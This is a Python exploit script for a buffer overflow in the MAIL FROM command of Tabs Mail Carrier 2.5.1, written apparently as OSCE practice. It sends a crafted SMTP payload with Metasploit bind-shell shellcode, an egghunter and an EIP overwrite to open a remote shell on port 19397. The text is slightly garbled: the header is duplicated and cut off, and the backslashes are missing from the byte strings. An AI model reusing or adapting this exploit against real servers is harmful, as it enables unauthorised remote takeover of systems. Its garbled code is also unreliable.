# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
# Date: March 14, 2019
# Exploit Author: Joseph McDonagh
# Vendor Homepage: N/A
# Software Link: N/A
# Vers # Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow
# Date: March 14, 2019
# Exploit Author: Joseph McDonagh
# Vendor Homepage: N/A
# Software Link: N/A
# Version: Mail Carrier 2.5.1
# Tested on: Windows Vista Home Basic SP2
# CVE: None


#!/usr/bin/python
#
# This script started from PWK, Chapter 6
# I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice
# During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow
# Thanks to the original authors of the EHLO parameter, gave me the
starting point and nudge I needed
#
# Usage ./tabs_mail.pwn.py 192.168.1.66
# Bind shell on TCP port 19397
# Tested on Windows Vista Home Basic SP 2

import sys
import socket
import time

if len(sys.argv) < 2:
print "[-]Usage: %s <target addr> " % sys.argv[0]

sys.exit(0)

ipaddr=sys.argv[1]
port=25

callebx="xb1x32x9cx0f"
sled="x90" * 8
egg="T00WT00W"

pay=egg

#msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='x00' -e
x86/shikata_ga_nai -f py | sed 's/buf/pay/g'
#[-] No platform was selected, choosing Msf::Module::Platform::Windows
from the payload
#[-] No arch selected, selecting arch: x86 from the payload
#Found 1 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of py file: 1710 bytes

pay += "xd9xe9xd9x74x24xf4x5ax2bxc9xb1x53xbex8c"
pay += "x69xbdxa0x31x72x17x03x72x17x83x4ex6dx5f"
pay += "x55xb2x86x1dx96x4ax57x42x1exafx66x42x44"
pay += "xa4xd9x72x0exe8xd5xf9x42x18x6dx8fx4ax2f"
pay += "xc6x3axadx1exd7x17x8dx01x5bx6axc2xe1x62"
pay += "xa5x17xe0xa3xd8xdaxb0x7cx96x49x24x08xe2"
pay += "x51xcfx42xe2xd1x2cx12x05xf3xe3x28x5cxd3"
pay += "x02xfcxd4x5ax1cxe1xd1x15x97xd1xaexa7x71"
pay += "x28x4ex0bxbcx84xbdx55xf9x23x5ex20xf3x57"
pay += "xe3x33xc0x2ax3fxb1xd2x8dxb4x61x3ex2fx18"
pay += "xf7xb5x23xd5x73x91x27xe8x50xaax5cx61x57"
pay += "x7cxd5x31x7cx58xbdxe2x1dxf9x1bx44x21x19"
pay += "xc4x39x87x52xe9x2exbax39x66x82xf7xc1x76"
pay += "x8cx80xb2x44x13x3bx5cxe5xdcxe5x9bx0axf7"
pay += "x52x33xf5xf8xa2x1ax32xacxf2x34x93xcdx98"
pay += "xc4x1cx18x34xccxbbxf3x2bx31x7bxa4xebx99"
pay += "x14xaexe3xc6x05xd1x29x6fxadx2cxd2xc4xeb"
pay += "xb8x34xb0xe3xecxefx2cxc6xcax27xcbx39x39"
pay += "x10x7bx71x2bxa7x84x82x79x8fx12x09x6ex0b"
pay += "x03x0exbbx3bx54x99x31xaax17x3bx45xe7xcf"
pay += "xd8xd4x6cx0fx96xc4x3ax58xffx3bx33x0cxed"
pay += "x62xedx32xecxf3xd6xf6x2bxc0xd9xf7xbex7c"
pay += "xfexe7x06x7cxbax53xd7x2bx14x0dx91x85xd6"
pay += "xe7x4bx79xb1x6fx0dxb1x02xe9x12x9cxf4x15"
pay += "xa2x49x41x2ax0bx1ex45x53x71xbexaax8ex31"
pay += "xcexe0x92x10x47xadx47x21x0ax4exb2x66x33"
pay += "xcdx36x17xc0xcdx33x12x8cx49xa8x6ex9dx3f"
pay += "xcexddx9ex15"

egghunter="x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7"

# Build the Buffer
buffer="A" * 700 # 5088 to EIP
buffer+=pay
buffer+="B" * (5088 - (700 + len(pay)))
buffer+=callebx # Overwrite EIP with Call EBX in c:WindowsSystem32expsrv.dll
buffer+=sled # 5100 bytes mark
buffer+="C" * 516 # This put us at the EBX register
buffer+=sled # NOPS
buffer+=egghunter
buffer+="D" * (5900 - len(buffer)) # Padding

try:
print "[-] Attacking Tab MailC Carrier MAIL FROM: with %s bytes" %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect ((ipaddr, port)) # Connect to IP & SMTP port
s.recv(1024) # receive banner
s.send('EHLO root@localhost ') # send EHLO
s.recv(1024) # receive reply
s.send('MAIL FROM: ' + buffer + ' ') # Send the phony Mail From
s.recv(1024)
s.send('RCPT TO: evelyn@evelyn ')
s.send('QUIT ')
s.close()
time.sleep(1)
print "[-] Done!"
except:
print "[-] Could not connect to target"
exit()